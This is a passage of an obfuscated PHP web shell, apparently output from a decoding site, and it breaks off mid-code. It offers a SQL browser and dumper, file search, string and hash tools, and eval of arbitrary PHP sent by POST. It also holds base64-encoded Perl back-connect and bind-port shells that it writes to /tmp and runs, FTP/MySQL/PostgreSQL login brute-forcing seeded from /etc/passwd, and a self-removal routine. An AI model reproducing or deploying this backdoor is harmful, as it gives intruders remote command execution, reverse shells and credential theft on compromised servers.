"; goto a2fa7; Dd8ea: if (!($item = $this->fetch())) { goto D1c3e; } goto F8cdb; B6127: goto af70a; goto f9e2b; b77a9: $i++; goto B6127; d1317: Ba08c: goto beca8; f9e2b: D1c3e: goto E1276; ec8fe: if ($i % 1000 == 0) { $head = true; $sql = ";
"; } goto cc377; E1276: if (!$head) { if ($fp) { fwrite($fp, ";
"); } else { echo ";
"; } } goto Ab8e1; Ea45b: $create = mysql_fetch_array($res); goto c260f; Ab8e1: goto d9583; goto A5d7e; B1b73: $this->query('SELECT * FROM `' . $table . '`'); goto D5621; E4552: foreach ($item as $k => $v) { goto a4a1e; F0a6f: A5883: goto C04a5; E7efd: $columns[] = "`" . $k . "`"; goto F0a6f; a4a1e: if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; } goto E7efd; C04a5: } goto d1317; B8b32: af70a: goto Dd8ea; beca8: if ($head) { $sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES
(" . implode(", ", $item) . ')'; $head = false; } else { $sql .= "
,(" . implode(", ", $item) . ')'; } goto cd11d; e721f: $head = true; goto B8b32; F8cdb: $sql = ''; goto ec8fe; cd11d: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto b77a9; a2fa7: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto B1b73; cc377: $columns = array(); goto E4552; f3f1e: $res = $this->query('SHOW CREATE TABLE `' . $table . '`'); goto Ea45b; A5d7e: case 'pgsql': goto Bc2fa; A5c5a: goto d9583; goto cbbc5; eea63: $columns = array(); goto db8eb; B232f: Ec90a: goto B8d51; E517a: Fbc09: goto A5c5a; Bb2e5: $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "
"; goto de295; db8eb: foreach ($item as $k => $v) { goto Ca7d5; Ca7d5: $item[$k] = "'" . addslashes($v) . "'"; goto A6901; A6901: $columns[] = $k; goto b954d; b954d: D3224: goto d8adc; d8adc: } goto A0f63; B8d51: if (!($item = $this->fetch())) { goto Fbc09; } goto eea63; de295: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto b6934; A0f63: f272f: goto Bb2e5; Bc2fa: $this->query('SELECT * FROM ' . $table); goto B232f; b6934: goto Ec90a; goto E517a; cbbc5: } goto Bc1d6; fc0e3: } } goto Fd048; f27b0: if (@$_POST['type'] == 'pgsql') { echo 'selected'; } goto b9260; Fd048: $db = new DbClass($_POST['type']); goto bf653; ecfe1: if (@$_POST['type'] == 'mysql') { echo 'selected'; } goto B93e3; cd62e: echo '</div>'; goto A793f; A793f: adugxFooter(); goto B0b4f; Facdd: if (isset($db) && $db->link) { goto b500a; b500a: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto bea6e; e274f: if ($_POST['type'] == 'mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto E26c7; bea6e: if (!empty($_POST['sql_base'])) { goto a2bdf; a5b91: echo "</textarea><br/><input type=submit value='Execute'>"; goto e0ef8; aa860: ed9ba: goto d5157; bc30f: $tbls_res = $db->listTables(); goto aa860; a2bdf: $db->selectdb($_POST['sql_base']); goto B57ba; Cd259: list($key, $value) = each($item); goto b2fdc; eb50e: $value = htmlspecialchars($value); goto d1102; Baaa1: if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if ($db->res !== false) { goto d3690; f8604: $line = $line == 1 ? 2 : 1; goto Dbe29; a7447: echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; goto dba0e; c9955: if (!$title) { goto Fd9e7; Cc779: $line = 2; goto B42d1; a4de1: F7435: goto d7b8b; Bdc39: echo '</tr><tr>'; goto Cc779; Fd9e7: echo '<tr>'; goto D661e; d7b8b: reset($item); goto Be7c8; D661e: foreach ($item as $key => $value) { echo '<th>' . $key . '</th>'; Dccc9: } goto a4de1; Be7c8: $title = true; goto Bdc39; B42d1: } goto Bf274; f61f9: E2892: goto f5bec; dba0e: $line = 1; goto Ec809; a54b6: echo '</tr>'; goto Da323; d3690: $title = false; goto a7447; Bf274: echo '<tr class="l' . $line . '">'; goto f8604; Dbe29: foreach ($item as $key => $value) { if ($value == null) { echo '<td><i>null</i></td>'; } else { echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>'; } B217f: } goto e6141; Ec809: B648a: goto E89f1; f5bec: echo '</table>'; goto dd9f1; E89f1: if (!($item = $db->fetch())) { goto E2892; } goto c9955; Da323: goto B648a; goto f61f9; e6141: Eea50: goto a54b6; dd9f1: } else { echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>'; } } goto B9052; eb081: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto d0ab0; d0ab0: if (@$_POST['p1'] == 'select') { goto ed9cc; d5f6f: echo " of {$pages}"; goto Bd888; D8448: $num = $db->fetch(); goto c123b; A3349: echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">"; goto d5f6f; aee99: echo "<br><br>"; goto dfe6d; ee436: $_POST['p3']--; goto F1ad2; f93ab: $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1; goto A0824; ba5d8: if ($_POST['p3'] < $pages) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>"; } goto ee436; A0824: $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); goto D8448; Bd888: if ($_POST['p3'] > 1) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>"; } goto ba5d8; F1ad2: if ($_POST['type'] == 'pgsql') { $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30; } else { $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30'; } goto aee99; ed9cc: $_POST['p1'] = 'query'; goto f93ab; c123b: $pages = ceil($num['n'] / 30); goto A3349; dfe6d: } goto Baaa1; B57ba: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto bc30f; d5157: if (!($item = $db->fetch($tbls_res))) { goto ce1c0; } goto Cd259; e0ef8: echo "</td></tr>"; goto B5855; Be6c9: ce1c0: goto eb081; b2fdc: if (!empty($_POST['sql_count'])) { $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); } goto eb50e; B9052: echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; goto d9f3f; bea51: goto ed9ba; goto Be6c9; d1102: echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>"; goto bea51; d9f3f: if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') { echo htmlspecialchars($_POST['p2']); } goto a5b91; B5855: } goto E8cbc; E26c7: if (@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>'; } goto E39a3; E8cbc: echo "</table></form><br/>"; goto e274f; E39a3: } else { echo htmlspecialchars($db->error()); } goto cd62e; f39cd: adugxHeader(); goto bac27; bac27: echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<td><select name='type'><option value='mysql' "; goto ecfe1; bf653: if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') { goto Cf091; Cf091: $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); goto a0072; a7413: F832d: goto F7464; a0072: $db->selectdb($_POST['sql_base']); goto F27b6; Ecd50: Cc4f6: goto a7413; F7464: if (empty($_POST['file'])) { goto a60a4; c3d93: exit; goto c2670; ebad0: foreach ($_POST['tbl'] as $v) { $db->dump($v); Ad580: } goto c1bfe; c1bfe: f2726: goto c3d93; a60a4: ob_start("ob_gzhandler", 4096); goto f4c6b; b5f4a: header("Content-Type: text/plain"); goto ebad0; f4c6b: header("Content-Disposition: attachment; filename=dump.sql"); goto b5f4a; c2670: } elseif ($fp = @fopen($_POST['file'], 'w')) { goto A97b3; A97b3: foreach ($_POST['tbl'] as $v) { $db->dump($v, $fp); D5783: } goto F617c; b69e0: fclose($fp); goto a0e61; a0e61: unset($_POST['p2']); goto c0a55; F617c: F6c6e: goto b69e0; c0a55: } else { die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } goto da650; F27b6: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto F832d; case "UTF-8": $db->setCharset('utf8'); goto F832d; case "KOI8-R": $db->setCharset('koi8r'); goto F832d; case "KOI8-U": $db->setCharset('koi8u'); goto F832d; case "cp866": $db->setCharset('cp866'); goto F832d; } goto Ecd50; da650: } goto f39cd; B93e3: echo ">MySql</option><option value='pgsql' "; goto f27b0; C86f1: if (isset($_POST['sql_host'])) { if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { goto B3150; F4a3b: echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>'; goto fb96f; fb96f: goto b6f39; goto Facd7; Bba48: echo "<select name=sql_base><option value=''></option>"; goto fd61c; B3150: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto e326c; case "UTF-8": $db->setCharset('utf8'); goto e326c; case "KOI8-R": $db->setCharset('koi8r'); goto e326c; case "KOI8-U": $db->setCharset('koi8u'); goto e326c; case "cp866": $db->setCharset('cp866'); goto e326c; } goto d712b; E7131: if (!($item = $db->fetch())) { goto fcf60; } goto f69a4; fd61c: b6f39: goto E7131; Aa5dd: $db->listDbs(); goto Bba48; f69a4: list($key, $value) = each($item); goto F4a3b; Facd7: fcf60: goto b7b46; b7b46: echo '</select>'; goto E0623; d1475: e326c: goto Aa5dd; d712b: e95a9: goto d1475; E0623: } else { echo $tmp; } } else { echo $tmp; } goto C3e0e; B0b4f: } goto Caaa5; D9101: $home_cwd = @getcwd(); goto e1f11; E5a36: function actionSelfRemove() { goto Dc5e5; Dc5e5: if ($_POST['p1'] == 'yes') { if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) { die('Shell has been removed'); } else { echo 'unlink error!'; } } goto C0e4b; Fb79d: adugxFooter(); goto d7225; c3e46: echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; goto Fb79d; C0e4b: if ($_POST['p1'] != 'yes') { adugxHeader(); } goto c3e46; d7225: } goto D0d0c; Ce628: function actionStringTools() { goto D50e4; D50e4: if (!function_exists('hex2bin')) { function hex2bin($p) { return decbin(hexdec($p)); } } goto A30f0; Ee9f5: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto B0d0e; D5c4a: echo "</pre></div><br><h1>Search files:</h1><div class=content>
<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>
<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
<tr><td></td><td><input type='submit' value='>>'></td></tr>
</table></form>"; goto a31d1; cffa5: $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen'); goto b4b87; Eb1fc: foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; Ce880: } goto Eb080; b4b87: if (isset($_POST['ajax'])) { goto B5649; Dac27: ob_start(); goto E0009; E0009: if (in_array($_POST['p1'], $stringTools)) { echo $_POST['p1']($_POST['p2']); } goto b1c04; b1c04: $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\'") . "';
"; goto bb313; E162c: exit; goto Ddd21; bb313: echo strlen($temp), "
", $temp; goto E162c; B5649: adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto Dac27; Ddd21: } goto Ee9f5; a7ab6: echo '<h1>String conversions</h1><div class=content>'; goto c336b; B0d0e: adugxHeader(); goto a7ab6; A8ef7: echo "</div><br><h1>Search for hash:</h1><div class=content>
<form method='post' target='_blank' name='hf'>
<input type='text' name='hash' style='width:200px;'><br>
<input type='hidden' name='act' value='find'/>
<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
<input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
</form></div>"; goto c5fd7; Fcd68: if (!function_exists('hex2ascii')) { function hex2ascii($p) { goto F4fbe; A658f: $r .= chr(hexdec($p[$i] . $p[$i + 1])); goto Aee9b; F4fbe: $r = ''; goto b27ec; a1b5f: goto C92ff; goto D5d92; F8dec: if (!($i < strLen($p))) { goto c2310; } goto A658f; F0121: return $r; goto E8acd; b27ec: $i = 0; goto a1ff5; Aee9b: c32bb: goto B2299; D5d92: c2310: goto F0121; a1ff5: C92ff: goto F8dec; B2299: $i += 2; goto a1b5f; E8acd: } } goto C8326; C8326: if (!function_exists('ascii2hex')) { function ascii2hex($p) { goto eadf4; Bd3a2: $r .= sprintf('%02X', ord($p[$i])); goto e324d; eb78e: $i = 0; goto B5f1d; b163e: return strtoupper($r); goto F7442; e324d: ea61b: goto e5d80; eadf4: $r = ''; goto eb78e; bf828: a2fe5: goto b163e; Dd1f8: if (!($i < strlen($p))) { goto a2fe5; } goto Bd3a2; B5f1d: ee202: goto Dd1f8; ae17c: goto ee202; goto bf828; e5d80: ++$i; goto ae17c; F7442: } } goto d08ac; c5fd7: adugxFooter(); goto c7b05; E3fbe: if (!empty($_POST['p1'])) { if (in_array($_POST['p1'], $stringTools)) { echo htmlspecialchars($_POST['p1']($_POST['p2'])); } } goto D5c4a; Eb080: Efb02: goto b15eb; A30f0: if (!function_exists('binhex')) { function binhex($p) { return dechex(bindec($p)); } } goto Fcd68; b15eb: echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>"; goto E3fbe; b6b7f: if (@$_POST['p3']) { adugxRecursiveGlob($_POST['c']); } goto A8ef7; d08ac: if (!function_exists('full_urlencode')) { function full_urlencode($p) { goto f8c4d; Ff0bb: $r .= '%' . dechex(ord($p[$i])); goto E6f62; d9a76: ++$i; goto f8cc9; f7614: $i = 0; goto e9f96; e37fa: return strtoupper($r); goto a1f66; C00d1: Ee174: goto e37fa; E6f62: f7685: goto d9a76; f8c4d: $r = ''; goto f7614; f8cc9: goto Cbeb6; goto C00d1; e9f96: Cbeb6: goto c2f1f; c2f1f: if (!($i < strlen($p))) { goto Ee174; } goto Ff0bb; a1f66: } } goto cffa5; c336b: echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; goto Eb1fc; a31d1: function adugxRecursiveGlob($path) { goto c3f4b; Ee16d: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { adugxRecursiveGlob($item); } } else { if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) { echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>"; } } C596b: } f1021: } goto bf8d8; a5af7: $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR))); goto Ee16d; c3f4b: if (substr($path, -1) != '/') { $path .= '/'; } goto a5af7; bf8d8: } goto b6b7f; c7b05: } goto C0045; ca9db: if (!$safe_mode) { error_reporting(0); } goto a7fa4; B0e97: @ini_set('log_errors', 0); goto f4602; ee956: $auth_pass = ""; goto d9dfc; ffd4b: function actionPhp() { goto b00c1; b00c1: if (isset($_POST['ajax'])) { goto a7526; d2b57: $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\'") . "';
"; goto A6cce; E1d4b: ob_start(); goto c5835; c5835: eval($_POST['p1']); goto d2b57; A6cce: echo strlen($temp), "
", $temp; goto Df3e1; Df3e1: exit; goto Dbada; a7526: adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto E1d4b; Dbada: } goto b1d83; D65a0: echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>'; goto Dc630; E3edc: adugxHeader(); goto b2afc; b1d83: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto E3edc; Dc630: if (!empty($_POST['p1'])) { goto D6a44; D6a44: ob_start(); goto Cef47; e8588: echo htmlspecialchars(ob_get_clean()); goto B2e49; Cef47: eval($_POST['p1']); goto e8588; B2e49: } goto f5bf6; e5a95: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">'; goto D65a0; a6883: adugxFooter(); goto B958c; b2afc: if (isset($_POST['p2']) && $_POST['p2'] == 'info') { goto B158e; B277b: phpinfo(); goto Db583; B158e: echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; goto a38fe; dcbd2: $tmp = preg_replace(array('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), $tmp); goto b8241; Db583: $tmp = ob_get_clean(); goto dcbd2; a38fe: ob_start(); goto B277b; b8241: echo str_replace('<h1', '<h2', $tmp) . '</div><br>'; goto Dca58; Dca58: } goto e5a95; f5bf6: echo '</pre></div>'; goto a6883; B958c: } goto c4a11; Caaa5: function actionNetwork() { goto fe95b; F0376: echo '</div>'; goto A94fc; db2f4: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto C2dc6; C2dc6: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; goto F8a36; fe95b: adugxHeader(); goto db2f4; C22d0: if (isset($_POST['p1'])) { goto Ea939; aac85: if ($_POST['p1'] == 'bcp') { goto d65f1; C8976: sleep(1); goto a6b53; cd5b6: unlink("/tmp/bc.pl"); goto f99b5; d65f1: cf("/tmp/bc.pl", $back_connect_p); goto Bf3b0; a6b53: echo "<pre class=ml1>{$out}
" . adugxEx("ps aux | grep bc.pl") . "</pre>"; goto cd5b6; Bf3b0: $out = adugxEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); goto C8976; f99b5: } goto ab70c; cca69: if ($_POST['p1'] == 'bpp') { goto e5378; e5378: cf("/tmp/bp.pl", $bind_port_p); goto Eef75; c38d5: echo "<pre class=ml1>{$out}
" . adugxEx("ps aux | grep bp.pl") . "</pre>"; goto E8097; C46ae: sleep(1); goto c38d5; Eef75: $out = adugxEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); goto C46ae; E8097: unlink("/tmp/bp.pl"); goto A1781; A1781: } goto aac85; Ea939: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto cca69; ab70c: } goto F0376; F8a36: echo "<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
<span>Bind port to /bin/sh [perl]</span><br/>
Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
</form>
<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
<span>Back-connect [perl]</span><br/>
Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
</form><br>"; goto C22d0; A94fc: adugxFooter(); goto Ad3eb; Ad3eb: } goto b0b4b; aaa81: function adugxPerms($p) { goto Fb1cb; df761: $i .= $p & 0x80 ? 'w' : '-'; goto Bc736; aafa4: $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-'); goto B27f6; Ee892: return $i; goto C769d; d1b2f: $i .= $p & 0x100 ? 'r' : '-'; goto df761; d1bf7: $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-'); goto Ee892; fd782: $i .= $p & 0x2 ? 'w' : '-'; goto d1bf7; Bc736: $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-'); goto ba002; B27f6: $i .= $p & 0x4 ? 'r' : '-'; goto fd782; Fb1cb: if (($p & 0xc000) == 0xc000) { $i = 's'; } elseif (($p & 0xa000) == 0xa000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } goto d1b2f; ba002: $i .= $p & 0x20 ? 'r' : '-'; goto Abea9; Abea9: $i .= $p & 0x10 ? 'w' : '-'; goto aafa4; C769d: } goto f4fd4; cdc37: if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) { function posix_getpwuid($p) { return false; } } goto E1797; Ba635: if (empty($_POST['a'])) { if (isset($default_action) && function_exists('action' . $default_action)) { $_POST['a'] = $default_action; } else { $_POST['a'] = 'SecInfo'; } } goto a676a; A1bb1: exit; ?>Did this file decode correctly?
Original Code
goto e44a6; a676a: if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) { call_user_func('action' . $_POST['a']); } goto A1bb1; D0d0c: function actionBruteforce() { goto E2a48; defb5: if (isset($_POST['proto'])) { goto Eb6da; Ab8ff: if ($_POST['proto'] == 'ftp') { function adugxBruteForce($ip, $port, $login, $pass) { goto a03b5; a03b5: $fp = @ftp_connect($ip, $port ? $port : 21); goto D5322; D5322: if (!$fp) { return false; } goto f4ee9; b0fd4: return $res; goto f1efd; f4ee9: $res = @ftp_login($fp, $login, $pass); goto C6f15; C6f15: @ftp_close($fp); goto b0fd4; f1efd: } } elseif ($_POST['proto'] == 'mysql') { function adugxBruteForce($ip, $port, $login, $pass) { goto e180b; C68fc: @mysql_close($res); goto b451a; e180b: $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass); goto C68fc; b451a: return $res; goto C8b86; C8b86: } } elseif ($_POST['proto'] == 'pgsql') { function adugxBruteForce($ip, $port, $login, $pass) { goto e2039; Fdd73: $res = @pg_connect($str); goto Abab5; e2039: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto Fdd73; A91fa: return $res; goto a637a; Abab5: @pg_close($res); goto A91fa; a637a: } } goto af231; Dfbe3: $server = explode(":", $_POST['server']); goto F49fa; ae8cf: $attempts = 0; goto Dfbe3; Bb016: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto cefca; Eb6da: echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>'; goto Ab8ff; F49fa: if ($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if (is_array($temp)) { foreach ($temp as $line) { goto C4cf7; Cf18e: D2d6e: goto Afb32; ad9d4: ++$attempts; goto Be8f1; F5843: if (@$_POST['reverse']) { goto bba3e; A45f5: if (adugxBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp); } goto a956a; Bb7cf: aacd9: goto C7728; C7728: --$i; goto ac35e; B9162: ad33e: goto Aea3a; df80b: c9132: goto Ee2a5; Aea3a: ++$attempts; goto A45f5; F483f: $tmp .= $line[0][$i]; goto 